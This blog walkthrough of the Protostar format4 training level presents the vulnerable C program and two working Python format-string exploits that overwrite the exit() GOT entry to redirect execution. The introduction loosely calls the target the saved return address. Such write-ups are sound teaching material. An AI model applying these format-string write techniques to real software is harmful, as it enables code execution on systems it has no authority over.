Binary Exploitation Protostar Format4 - Walkthrough

Posted by Suraj Singh on May 10, 2018 · 4 mins read
Hello Guyz,

Welcome again to my blog. Today, I am going to share my walkthrough of the Exploit Exercises Protostar Format4 level.

In this level, our goal is to overwrite a pointer (the saved return address) so that, later on, we can use this vulnerability to execute injected shellcode. In practice we only need to prove that the vulnerability lets us overwrite the EIP register, but this level adds another difficulty. As the hint already says:

We have to use a format string vulnerability to overwrite the instruction pointer register.

While researching this vulnerability, I found the articles below very useful, so use them as references on format string vulnerabilities.

2. StackOverflow
3. PDF

Before starting the walkthrough, let's take a look at the hints and details.

Note: I want to highlight a few points.

  • I'm not the creator of the Protostar war game; I am just a player.
  • Here I am just providing hints and references, so if you feel stuck anywhere, take a look here.
  • Understand all previous levels before starting this one.
  • Do some research on assembly, C/C++ and GDB.

Source Code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

/* Never called by the program itself: the goal is to redirect execution here. */
void hello()
{
  printf("code execution redirected! you win\n");
  _exit(1);
}

void vuln()
{
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);

  /* Format string vulnerability: user input is passed as the format argument. */
  printf(buffer);

  /* exit() is resolved through the GOT; its GOT entry is what the exploit overwrites. */
  exit(1);
}

int main(int argc, char **argv)
{
  vuln();
}

Hints

format4 looks at one method of redirecting execution in a process.

objdump -TR is your friend.
This level is at /opt/protostar/bin/format4

Exploit
import struct
import sys

# Usage: python3 exploit.py | ./format4

# Number of bytes printed before each %n:
# first %n must see 0x84b4 = 33972 = 8 (addresses) + 11 (output of %x%x) + 33953,
# second %n must see 0x10804 = 33972 + 33616; only its low 16 bits matter.
p3 = b"%33953x%4$n"
p3 += b"%33616x%5$n"

# We want to write 0x080484b4 (address of hello) into the address below [exit GOT entry],
# in two 16-bit halves at 0x08049724 and 0x08049726.
p1 = struct.pack("<I", 0x08049724)
p2 = struct.pack("<I", 0x08049726)
p2 += b"%x%x"   # consume the two stack words before our buffer (on format4 they print as 11 characters)
sys.stdout.buffer.write(p1 + p2 + p3)

Exploit (Alternate Way)

import struct
import sys

# Usage: python3 exploit.py | ./format4
# =================================================
# Format4 [Fill in 4 Parts]
# =================================================
# [Step One] Analyse paddings: find how many %x it takes to reach our own buffer
p1 = b"aaaa"
p2 = b"%x%x%x"
p3 = b"%x"

# sys.stdout.buffer.write(p1 + p2 + p3)   # the fourth %x should print 61616161 ("aaaa")

padding = 4

# [Step Two] Check the padding with direct parameter access

# sys.stdout.buffer.write(p1 + b"%" + str(padding).encode() + b"$x")   # should print 61616161

# [Step Three] Install our malicious address into the stack in 4 parts
# Find the GOT entry of exit() using: objdump -TR format4
# 0x08049724

p = b""
p += struct.pack("<I", 0x08049724)
p += struct.pack("<I", 0x08049725)
p += struct.pack("<I", 0x08049726)
p += struct.pack("<I", 0x08049727)

# Need to write 0x080484b4 (address of hello) one byte at a time: b4, 84, 04, 08.
# Each %<width>x pads the running byte count; each %N$n stores that count at the N-th stack word.

p += b"%164x"   # first padding:  16 + 164 = 180 = 0xb4
p += b"%4$n"
p += b"%208x"   # second padding: 180 + 208 = 388 = 0x184 -> low byte 0x84
p += b"%5$n"
p += b"%128x"   # third padding:  388 + 128 = 516 = 0x204 -> low byte 0x04
p += b"%6$n"
p += b"%260x"   # fourth padding: 516 + 260 = 776 = 0x308 -> low byte 0x08
p += b"%7$n"

sys.stdout.buffer.write(p)

For a more detailed walkthrough, check the YouTube video playlist below:

Bitforestinfo YouTube Protostar CTF Playlist